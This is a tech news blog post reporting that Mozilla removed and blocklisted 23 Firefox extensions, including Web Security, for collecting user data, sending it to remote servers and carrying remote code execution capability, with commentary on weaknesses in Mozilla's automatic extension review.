by Martin Brinkmann on August 17, 2018 in Firefox – Last Update: August 18, 2018 – 11 comments
Mozilla purged 23 Firefox extensions from the official Firefox Addons website Mozilla AMO and browsers the extensions were installed in today.
The ban affects 23 extensions for Firefox that were installed by more than 500,000 users of the browser. The list includes the infamous Web Security extension that Mozilla highlighted as a “great” privacy extension in a blog post on the official site before deleting any reference without mentioning the fact in the blog post.
Web Security had 220,000 users at that time; other banned extensions include Facebook Video Downloader, Popup-Blocker, Simply Search, Auto Destroy Cookies, or Google NoTrack.
A bug report on the official Bugzilla bug tracking site that Mozilla maintains lists all extension IDs that are affected.
Mozilla Engineer Rob Wu analyzed the Web Security extension after it hit the news. He made the decision to search for Web Security patterns in all publicly available Firefox extensions and found extensions that used similar snooping code. In fact, all extensions were found to send data to the same server that Web Security connected to.
All extensions collected user data and sent the data to remote servers according to Mozilla.
Wu reported his findings to Mozilla which added the IDs of the extension to the blocklist the organization maintains and removed the add-ons from the Mozilla website.
Extensions that land on the blocklist are automatically disabled if they are installed in Firefox and are no longer usable. Firefox’s Add-ons blocklist is a public list that anyone can access.
The blocklist has three entries for August 16 and one of them is for Web Security and other add-ons.
Web Security and others — Sending user data to remote servers unnecessarily, and potential for remote code execution. Suspicious account activity for multiple accounts on AMO.
Mozilla published an explanation why it made the decision to block the extensions for Firefox on Bugzilla:
- The extensions sent more data to remote servers than seemed necessary.
- Some of the data is sent across insecure connections.
- The data collecting and sending is not made clear or disclosed clearly apart from being revealed in a large privacy policy.
- The potential to execute code remotely is built into the extensions, and partial obfuscation is used to make identification more complicated.
- Same code exists in multiple add-ons that have different features and different authors. It appears that the same developer or group is behind all these extensions.
Closing Words
Removal of extensions from Mozilla AMO and use of the blocklist feature to get them disabled in Firefox installations was the right move by Mozilla.
One has to ask, however, why these extensions were not blocked from being listed in first place. Mozilla changed the review process for Firefox WebExtensions in 2017 from manual (human) reviews to automatic (computer) reviews. Human reviews are still a thing on Mozilla AMO but extensions can land in the Store when they pass automatic reviews.
While that decreases the time it takes to publish new extensions and extension updates, it also means that the chance that malicious, privacy invasive, or otherwise problematic extensions land in the Store.
Mozilla had to step in several times in the past already, for instance when several crypto mining extensions were unleashed. The system is not nearly as bad as Google’s for Chrome extensions, but it is far from being perfectly safe. (via Bleeping Computer)
Now You: What is your take on this?